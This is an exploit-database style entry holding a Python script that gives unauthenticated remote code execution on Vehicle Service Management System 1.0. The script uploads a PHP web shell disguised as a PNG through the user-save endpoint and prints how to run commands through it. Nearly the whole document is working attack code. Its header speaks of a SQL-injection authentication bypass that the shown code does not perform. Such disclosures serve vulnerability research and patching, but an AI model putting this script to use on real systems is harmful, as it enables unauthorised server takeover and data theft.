Vehicle Service Management System version 1.0 unauthenticated remote shell upload exploit that uses authentication bypass with SQL injection.
6c102a236cb9e21f5427c1ae2c9ecec8289f62748f674b9bd2f0e484459314c2
# Exploit Title: Vehicle Service Managment 1.0 - RCE (Unauthenticated)
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10
import requests
HOST="http://localhost"
UPLOAD_URL="/vehicle_service/classes/Users.php?f=save"
s = requests.Session()
def sendShell():
payload = "<?php system($_GET['c']);?>"
data = {
"id":"1",
"firstname":"Adminstrator",
"lastname":"fake",
"username":"fake",
"password":"fake"
}
filedata = {"img":("shell.php",payload,
"image/png", {"Content-Disposition": "form-data"}
) }
prox = {"http":"http://127.0.0.1:8080"}
r = s.post(f"{HOST}{UPLOAD_URL}", data=data, proxies=prox, files=filedata)
if (r.status_code == 200):
print("[+] Shell upload successful")
print(f"[-] Check in {HOST}/vehicle_service/uploads/ for the shell")
print(f"[-] Usage: *shell.php?c=id")
print("[-] Ie: http://localhost/vehicle_service/uploads/{SERVERTIME}_shell.php?c=whoami")
def banner():
return r"""
__ _______ __ __ __ ___
\ \ / / ____| \/ | /_ | / _ \
\ \ / / (___ | \ / | | || | | |
\ \/ / \___ \| |\/| | | || | | |
\ / ____) | | | | | || |_| |
\/ |_____/|_| |_| |_(_)___/
"""
print(banner())
print("Vehicle Service Managment 1.0 RCE ~ Created by Richard Jones")
print("[+] Trying shell upload")
sendShell()